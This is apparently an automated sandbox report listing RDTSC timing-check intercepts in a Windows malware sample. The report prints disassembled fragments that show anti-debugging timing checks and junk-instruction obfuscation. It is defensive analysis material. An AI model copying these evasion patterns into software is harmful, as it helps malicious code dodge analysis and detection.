Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E353 second address: 139E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E914 second address: 139E91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E91A second address: 139E921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E921 second address: 139E93E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F0527E411h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139E93E second address: 139E948 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139EC11 second address: 139EC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139EC19 second address: 139EC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139EC1F second address: 139EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139ED6D second address: 139ED9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0F04CBD325h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007F0F04CBD316h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F04CBD31Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A25E9 second address: 13A25ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1368DB0 second address: 1368DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1374D0B second address: 1374D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AB8E8 second address: 13AB902 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F04CBD324h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AB902 second address: 13AB906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ABBF8 second address: 13ABC2A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F04CBD316h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 je 00007F0F04CBD316h 0x00000016 jmp 00007F0F04CBD31Ah 0x0000001b jl 00007F0F04CBD316h 0x00000021 popad 0x00000022 jmp 00007F0F04CBD31Bh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ABEE6 second address: 13ABEEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AC1BA second address: 13AC1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AC1BE second address: 13AC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AC1C6 second address: 13AC204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0F04CBD316h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F0F04CBD31Ch 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0F04CBD31Ch 0x0000001a jmp 00007F0F04CBD326h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AC204 second address: 13AC215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0F0527E406h 0x00000009 jnc 00007F0F0527E406h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD7ED second address: 13AD7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD7F3 second address: 13AD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ADD4A second address: 13ADD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ADE1E second address: 13ADE24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ADEE6 second address: 13ADEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ADEEE second address: 13ADF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F0527E40Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE1A4 second address: 13AE1AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE1AE second address: 13AE1B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F0527E40Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE1B8 second address: 13AE1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0F04CBD316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE1C8 second address: 13AE1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE299 second address: 13AE29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE371 second address: 13AE376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE99C second address: 13AE9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE9A0 second address: 13AE9B2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F0F0527E406h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE9B2 second address: 13AE9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE9B6 second address: 13AEA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0F0527E408h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D37D4h] 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2ABEh], edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F0F0527E408h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D3394h], ecx 0x00000052 sub dword ptr [ebp+122D2AE5h], edx 0x00000058 xchg eax, ebx 0x00000059 push ecx 0x0000005a jo 00007F0F0527E40Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AEA21 second address: 13AEA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B12BD second address: 13B1364 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F0F0527E408h 0x00000010 popad 0x00000011 nop 0x00000012 adc edi, 4C01FE11h 0x00000018 push esi 0x00000019 mov edi, dword ptr [ebp+122D1F9Ah] 0x0000001f pop esi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F0F0527E408h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c call 00007F0F0527E40Bh 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F0F0527E408h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov edi, 77939EEFh 0x00000063 mov si, DEFDh 0x00000067 xchg eax, ebx 0x00000068 jmp 00007F0F0527E411h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F0F0527E40Dh 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B1364 second address: 13B136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B2A2C second address: 13B2A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B2A3D second address: 13B2A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C405 second address: 136C419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C419 second address: 136C430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD323h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C430 second address: 136C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C445 second address: 136C457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0F04CBD316h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C457 second address: 136C4B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F0527E406h 0x00000008 jp 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F0F0527E412h 0x00000016 jmp 00007F0F0527E413h 0x0000001b pop ebx 0x0000001c jmp 00007F0F0527E40Fh 0x00000021 pushad 0x00000022 jmp 00007F0F0527E40Fh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4BA4 second address: 13B4BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4BA8 second address: 13B4BAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B70AF second address: 13B70C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD31Dh 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B70C5 second address: 13B70CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B70CB second address: 13B70D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BA9B3 second address: 13BA9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0F0527E406h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BA9C5 second address: 13BA9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BAF34 second address: 13BAF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BAF38 second address: 13BAF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BAF3C second address: 13BAF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BAF42 second address: 13BAFD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0F04CBD318h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jl 00007F0F04CBD31Ch 0x0000002c mov edi, dword ptr [ebp+122D39E0h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F0F04CBD318h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e add bx, 372Fh 0x00000053 pushad 0x00000054 mov edi, dword ptr [ebp+122D2378h] 0x0000005a mov eax, dword ptr [ebp+122D57FBh] 0x00000060 popad 0x00000061 push 00000000h 0x00000063 push ecx 0x00000064 push esi 0x00000065 mov dword ptr [ebp+1248114Dh], esi 0x0000006b pop ebx 0x0000006c pop edi 0x0000006d push eax 0x0000006e je 00007F0F04CBD324h 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BBF4A second address: 13BBF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0F0527E408h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 movzx ebx, dx 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D2598h], ebx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0F0527E412h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BC142 second address: 13BC200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD323h 0x0000000b popad 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D3A40h] 0x00000013 jmp 00007F0F04CBD320h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f cld 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F0F04CBD318h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0D85h] 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F0F04CBD318h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 jmp 00007F0F04CBD329h 0x00000066 sub ebx, dword ptr [ebp+122D1C8Bh] 0x0000006c push FFFFFFFFh 0x0000006e xor ebx, 4996BBB4h 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F0F04CBD31Eh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BD01A second address: 13BD0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 jmp 00007F0F0527E417h 0x0000000e nop 0x0000000f sbb edi, 2FF08F2Ah 0x00000015 push dword ptr fs:[00000000h] 0x0000001c cmc 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 sub dword ptr [ebp+1248D1F9h], ecx 0x0000002a mov eax, dword ptr [ebp+122D0E91h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0F0527E408h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D1F76h] 0x00000050 xor dword ptr [ebp+122D2AA3h], edi 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push edx 0x0000005b call 00007F0F0527E408h 0x00000060 pop edx 0x00000061 mov dword ptr [esp+04h], edx 0x00000065 add dword ptr [esp+04h], 00000019h 0x0000006d inc edx 0x0000006e push edx 0x0000006f ret 0x00000070 pop edx 0x00000071 ret 0x00000072 movsx ebx, si 0x00000075 push eax 0x00000076 jp 00007F0F0527E424h 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BEF79 second address: 13BEF7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BEF7D second address: 13BEFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E40Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F0F0527E40Ch 0x00000013 jnp 00007F0F0527E406h 0x00000019 jmp 00007F0F0527E419h 0x0000001e push ecx 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF78E second address: 13BF7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD328h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F04CBD323h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF7C0 second address: 13BF7CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF7CD second address: 13BF7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1689 second address: 13C16A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF7D1 second address: 13BF7DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C26E9 second address: 13C26F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C17EB second address: 13C17F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C17F1 second address: 13C17F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C18F8 second address: 13C1902 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1902 second address: 13C1908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1908 second address: 13C190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C29CD second address: 13C29D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C7694 second address: 13C76A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0F04CBD31Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C76A9 second address: 13C76AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C76AD second address: 13C76C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F04CBD322h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C76C9 second address: 13C771B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push esi 0x0000000b and edi, 4DA04C99h 0x00000011 pop ebx 0x00000012 push 00000000h 0x00000014 jo 00007F0F0527E407h 0x0000001a cmc 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F0F0527E408h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C8816 second address: 13C881A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
